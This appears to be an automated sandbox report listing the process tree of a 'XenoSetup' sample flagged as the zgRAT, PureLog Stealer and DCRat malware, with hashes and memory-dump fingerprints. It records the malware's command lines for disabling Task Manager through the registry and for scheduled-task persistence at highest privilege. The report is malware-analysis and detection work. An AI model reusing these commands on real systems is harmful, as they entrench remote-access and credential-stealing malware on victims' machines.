                                                                                    Commandline:C:\Windows\system32\cmd.exe /c ""C:\portBrokerDll\Ac4k16M5JuZ3cBUzCeuZfRwt20LYrImECkDEo2qhe7JRV.bat" "
                                                                                    Imagebase:0x1c0000
                                                                                    File size:236'544 bytes
                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Target ID:13
                                                                                    Start time:07:32:45
                                                                                    Start date:13/01/2025
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff66e660000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Target ID:14
                                                                                    Start time:07:32:45
                                                                                    Start date:13/01/2025
                                                                                    Path:C:\Windows\SysWOW64\reg.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
                                                                                    Imagebase:0xc70000
                                                                                    File size:59'392 bytes
                                                                                    MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Target ID:15
                                                                                    Start time:07:32:45
                                                                                    Start date:13/01/2025
                                                                                    Path:C:\portBrokerDll\DriverbrokerCrtDhcp.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\portBrokerDll/DriverbrokerCrtDhcp.exe"
                                                                                    Imagebase:0xf90000
                                                                                    File size:3'420'843 bytes
                                                                                    MD5 hash:C9D8BCE0425ED81346B9A43F148D948B
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: 0000000F.00000002.2691486762.000000001BCC0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000F.00000002.2691486762.000000001BCC0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000F.00000002.2633412439.0000000013584000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000000F.00000002.2633412439.0000000013BEA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    Reputation:low
                                                                                    Has exited:true

                                                                                    Target ID:16
                                                                                    Start time:07:32:47
                                                                                    Start date:13/01/2025
                                                                                    Path:C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe"
                                                                                    Imagebase:0xfe0000
                                                                                    File size:3'720'701 bytes
                                                                                    MD5 hash:BCF49847A74E554A807294D4F5ADFA62
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:low
                                                                                    Has exited:true

                                                                                    Target ID:17
                                                                                    Start time:07:32:47
                                                                                    Start date:13/01/2025
                                                                                    Path:C:\Windows\SysWOW64\wscript.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Windows\System32\WScript.exe" "C:\portBrokerDll\2jfojLJgRy.vbe"
                                                                                    Imagebase:0x2e0000
                                                                                    File size:147'456 bytes
                                                                                    MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Target ID:19
                                                                                    Start time:07:32:50
                                                                                    Start date:13/01/2025
                                                                                    Path:C:\Windows\System32\schtasks.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:schtasks.exe /create /tn "NZdXlPbVdUubKXQN" /sc MINUTE /mo 8 /tr "'C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe'" /f
                                                                                    Imagebase:0x7ff709ba0000
                                                                                    File size:235'008 bytes
                                                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:20
                                                                                    Start time:07:32:50
                                                                                    Start date:13/01/2025
                                                                                    Path:C:\Windows\System32\schtasks.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:schtasks.exe /create /tn "NZdXlPbVdUubKXQ" /sc ONLOGON /tr "'C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe'" /rl HIGHEST /f
                                                                                    Imagebase:0x7ff709ba0000
                                                                                    File size:235'008 bytes
                                                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:21
                                                                                    Start time:07:32:50
                                                                                    Start date:13/01/2025
                                                                                    Path:C:\Windows\System32\schtasks.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:schtasks.exe /create /tn "NZdXlPbVdUubKXQN" /sc MINUTE /mo 12 /tr "'C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe'" /rl HIGHEST /f
                                                                                    Imagebase:0x7ff709ba0000
                                                                                    File size:235'008 bytes
                                                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:22
                                                                                    Start time:07:32:50
                                                                                    Start date:13/01/2025
                                                                                    Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\w5cymjn5\w5cymjn5.cmdline"
                                                                                    Imagebase:0x7ff702300000
                                                                                    File size:2'759'232 bytes
                                                                                    MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:23
                                                                                    Start time:07:32:50
                                                                                    Start date:13/01/2025
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff66e660000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:24
                                                                                    Start time:07:32:50
                                                                                    Start date:13/01/2025
                                                                                    Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4177.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSCEACDD11852CD4DF0A8C4FA8867592994.TMP"
                                                                                    Imagebase:0x7ff66cc20000
                                                                                    File size:52'744 bytes
                                                                                    MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:25
                                                                                    Start time:07:32:51
                                                                                    Start date:13/01/2025
                                                                                    Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xze5z45r\xze5z45r.cmdline"
                                                                                    Imagebase:0x7ff702300000
                                                                                    File size:2'759'232 bytes
                                                                                    MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:26
                                                                                    Start time:07:32:51
                                                                                    Start date:13/01/2025
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff66e660000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:27
                                                                                    Start time:07:32:51
                                                                                    Start date:13/01/2025
                                                                                    Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES436B.tmp" "c:\Users\user\AppData\Local\Temp\CSCF5A66DC0AE3041F58A3C1CE4B9A61B98.TMP"
                                                                                    Imagebase:0x7ff66cc20000
                                                                                    File size:52'744 bytes
                                                                                    MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:28
                                                                                    Start time:07:32:51
                                                                                    Start date:13/01/2025
                                                                                    Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3tshlj5d\3tshlj5d.cmdline"
                                                                                    Imagebase:0x7ff702300000
                                                                                    File size:2'759'232 bytes
                                                                                    MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:29
                                                                                    Start time:07:32:51
                                                                                    Start date:13/01/2025
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff66e660000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:30
                                                                                    Start time:07:32:51
                                                                                    Start date:13/01/2025
                                                                                    Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES458E.tmp" "c:\Windows\System32\CSC3568A44F8D2D461ABD894E9C160B8C.TMP"
                                                                                    Imagebase:0x7ff66cc20000
                                                                                    File size:52'744 bytes
                                                                                    MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:31
                                                                                    Start time:07:32:51
                                                                                    Start date:13/01/2025
                                                                                    Path:C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe
                                                                                    Imagebase:0xd20000
                                                                                    File size:3'420'843 bytes
                                                                                    MD5 hash:C9D8BCE0425ED81346B9A43F148D948B
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:32
                                                                                    Start time:07:32:52
                                                                                    Start date:13/01/2025
                                                                                    Path:C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe
                                                                                    Imagebase:0xab0000
                                                                                    File size:3'420'843 bytes
                                                                                    MD5 hash:C9D8BCE0425ED81346B9A43F148D948B
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:33
                                                                                    Start time:07:32:52
                                                                                    Start date:13/01/2025
                                                                                    Path:C:\Windows\System32\schtasks.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:schtasks.exe /create /tn "DriverbrokerCrtDhcpD" /sc MINUTE /mo 10 /tr "'C:\portBrokerDll\DriverbrokerCrtDhcp.exe'" /f
                                                                                    Imagebase:0x7ff709ba0000
                                                                                    File size:235'008 bytes
                                                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:34
                                                                                    Start time:07:32:52
                                                                                    Start date:13/01/2025
                                                                                    Path:C:\Windows\System32\schtasks.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:schtasks.exe /create /tn "DriverbrokerCrtDhcp" /sc ONLOGON /tr "'C:\portBrokerDll\DriverbrokerCrtDhcp.exe'" /rl HIGHEST /f
                                                                                    Imagebase:0x7ff709ba0000
                                                                                    File size:235'008 bytes
                                                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:35
                                                                                    Start time:07:32:52
                                                                                    Start date:13/01/2025
                                                                                    Path:C:\Windows\System32\schtasks.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:schtasks.exe /create /tn "DriverbrokerCrtDhcpD" /sc MINUTE /mo 13 /tr "'C:\portBrokerDll\DriverbrokerCrtDhcp.exe'" /rl HIGHEST /f
                                                                                    Imagebase:0x7ff709ba0000
                                                                                    File size:235'008 bytes
                                                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:36
                                                                                    Start time:07:32:52
                                                                                    Start date:13/01/2025
                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\8dcADkVv20.bat"
                                                                                    Imagebase:0x7ff64f2f0000
                                                                                    File size:289'792 bytes
                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:37
                                                                                    Start time:07:32:53
                                                                                    Start date:13/01/2025
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff66e660000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:38
                                                                                    Start time:07:32:53
                                                                                    Start date:13/01/2025
                                                                                    Path:C:\Windows\System32\chcp.com
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:chcp 65001
                                                                                    Imagebase:0x7ff6f1810000
                                                                                    File size:14'848 bytes
                                                                                    MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:39
                                                                                    Start time:07:32:53
                                                                                    Start date:13/01/2025
                                                                                    Path:C:\Windows\System32\PING.EXE
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:ping -n 10 localhost
                                                                                    Imagebase:0x7ff7a97b0000
                                                                                    File size:22'528 bytes
                                                                                    MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:40
                                                                                    Start time:07:32:54
                                                                                    Start date:13/01/2025
                                                                                    Path:C:\portBrokerDll\DriverbrokerCrtDhcp.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\portBrokerDll\DriverbrokerCrtDhcp.exe
                                                                                    Imagebase:0x210000
                                                                                    File size:3'420'843 bytes
                                                                                    MD5 hash:C9D8BCE0425ED81346B9A43F148D948B
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:41
                                                                                    Start time:07:32:54
                                                                                    Start date:13/01/2025
                                                                                    Path:C:\portBrokerDll\DriverbrokerCrtDhcp.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\portBrokerDll\DriverbrokerCrtDhcp.exe
                                                                                    Imagebase:0x820000
                                                                                    File size:3'420'843 bytes
                                                                                    MD5 hash:C9D8BCE0425ED81346B9A43F148D948B
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:42
                                                                                    Start time:07:32:56
                                                                                    Start date:13/01/2025
                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:C:\Windows\system32\cmd.exe /c ""C:\portBrokerDll\Ac4k16M5JuZ3cBUzCeuZfRwt20LYrImECkDEo2qhe7JRV.bat" "
                                                                                    Imagebase:0x1c0000
                                                                                    File size:236'544 bytes
                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:43
                                                                                    Start time:07:32:57
                                                                                    Start date:13/01/2025
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff66e660000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:44
                                                                                    Start time:07:32:57
                                                                                    Start date:13/01/2025
                                                                                    Path:C:\Windows\SysWOW64\reg.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
                                                                                    Imagebase:0xc70000
                                                                                    File size:59'392 bytes
                                                                                    MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:45
                                                                                    Start time:07:32:57
                                                                                    Start date:13/01/2025
                                                                                    Path:C:\portBrokerDll\DriverbrokerCrtDhcp.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\portBrokerDll/DriverbrokerCrtDhcp.exe"
                                                                                    Imagebase:0x7d0000
                                                                                    File size:3'420'843 bytes
                                                                                    MD5 hash:C9D8BCE0425ED81346B9A43F148D948B
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:47
                                                                                    Start time:07:33:02
                                                                                    Start date:13/01/2025
                                                                                    Path:C:\portBrokerDll\DriverbrokerCrtDhcp.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\portBrokerDll\DriverbrokerCrtDhcp.exe"
                                                                                    Imagebase:0xc80000
                                                                                    File size:3'420'843 bytes
                                                                                    MD5 hash:C9D8BCE0425ED81346B9A43F148D948B
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:48
                                                                                    Start time:07:33:05
                                                                                    Start date:13/01/2025
                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:C:\Windows\system32\cmd.exe /c ""C:\portBrokerDll\Ac4k16M5JuZ3cBUzCeuZfRwt20LYrImECkDEo2qhe7JRV.bat" "
                                                                                    Imagebase:0x1c0000
                                                                                    File size:236'544 bytes
                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:49
                                                                                    Start time:07:33:05
                                                                                    Start date:13/01/2025
                                                                                    Path:C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe"
                                                                                    Imagebase:0x420000
                                                                                    File size:3'420'843 bytes
                                                                                    MD5 hash:C9D8BCE0425ED81346B9A43F148D948B
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:50
                                                                                    Start time:07:33:05
                                                                                    Start date:13/01/2025
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff66e660000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:51
                                                                                    Start time:07:33:05
                                                                                    Start date:13/01/2025
                                                                                    Path:C:\Windows\SysWOW64\reg.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
                                                                                    Imagebase:0xc70000
                                                                                    File size:59'392 bytes
                                                                                    MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:52
                                                                                    Start time:07:33:06
                                                                                    Start date:13/01/2025
                                                                                    Path:C:\portBrokerDll\DriverbrokerCrtDhcp.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\portBrokerDll/DriverbrokerCrtDhcp.exe"
                                                                                    Imagebase:0x7f0000
                                                                                    File size:3'420'843 bytes
                                                                                    MD5 hash:C9D8BCE0425ED81346B9A43F148D948B
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Reset < >
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2354819212.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd348b0000_XenoSetup(2).jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 52bee924754f3e0551a6b18f375783e9f1262111865db3343487df3c19029624
                                                                                      • Instruction ID: 0e6b6cfdd2ffda9d9efd9a871f8ba1ce6d52bcca42074bc2b9c0197afc6b20fc
                                                                                      • Opcode Fuzzy Hash: 52bee924754f3e0551a6b18f375783e9f1262111865db3343487df3c19029624
                                                                                      • Instruction Fuzzy Hash: 09F17430B1C91A8FDB98EB68C4A467D73E2FF56311B514639E91EC32D2CE78AC119780
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2354819212.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd348b0000_XenoSetup(2).jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: >M_^$M_^$3CM_^
                                                                                      • API String ID: 0-1644849703
                                                                                      • Opcode ID: e0db6f851ad62c58b98ce5f9e69b2ebf1a367601fbf81bec5e77b6c6cdacfbaa
                                                                                      • Instruction ID: 8381c0636a0c4b000131d3f9bf1283d452ee5fb6d0c060a9d647a05b8833ba03
                                                                                      • Opcode Fuzzy Hash: e0db6f851ad62c58b98ce5f9e69b2ebf1a367601fbf81bec5e77b6c6cdacfbaa
                                                                                      • Instruction Fuzzy Hash: 9D31EA13B0D3824FE666637C58B61E93BA09F93325F0841B7C288DA0D3ED5E284696D2
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2354819212.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd348b0000_XenoSetup(2).jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: M_^$3CM_^
                                                                                      • API String ID: 0-3398705814
                                                                                      • Opcode ID: fd53fc9629656bec18eb36f12cb423ac132fb42bd5c6d9210134568f4afa5bca
                                                                                      • Instruction ID: 7837e4b3bf7dd8b1db0d6bf1a2860a8d4e8885ceac83afe0feb717255fa1a140
                                                                                      • Opcode Fuzzy Hash: fd53fc9629656bec18eb36f12cb423ac132fb42bd5c6d9210134568f4afa5bca
                                                                                      • Instruction Fuzzy Hash: E931B852B0E7850FE76663B858B61E93BA0DF93315F0801F7C2C8DA0D3ED5E64469291
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2354819212.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd348b0000_XenoSetup(2).jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Xyz4$yz4
                                                                                      • API String ID: 0-3381115999
                                                                                      • Opcode ID: e746372006de1b20b9167b661f0eb0128204ef93e766c07abf2b6fdbe576e67b
                                                                                      • Instruction ID: 305a1ada56d2425c42496b76911706ad088f8c14c718ffbd8555261357164e63
                                                                                      • Opcode Fuzzy Hash: e746372006de1b20b9167b661f0eb0128204ef93e766c07abf2b6fdbe576e67b
                                                                                      • Instruction Fuzzy Hash: 9F31C521A0D68E4FD782D7A888B51ED7FF1EF87220F4801BBD549EB293DD6C68068351
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2354819212.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd348b0000_XenoSetup(2).jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 5c22aa051c559d99e14d50c6a27866f9dca2d125d6b57ff4e9d2eb452cfab2a8
                                                                                      • Instruction ID: 8c7339244a4c22bc89d74dadb30a5a307f970e7f16a961e4bbd005bc3bad6501
                                                                                      • Opcode Fuzzy Hash: 5c22aa051c559d99e14d50c6a27866f9dca2d125d6b57ff4e9d2eb452cfab2a8
                                                                                      • Instruction Fuzzy Hash: 61C12761B0CA854FE795DB6844B93B87BD2FFAA350F0801BAD44DC7293DD78A8459381
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2354819212.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
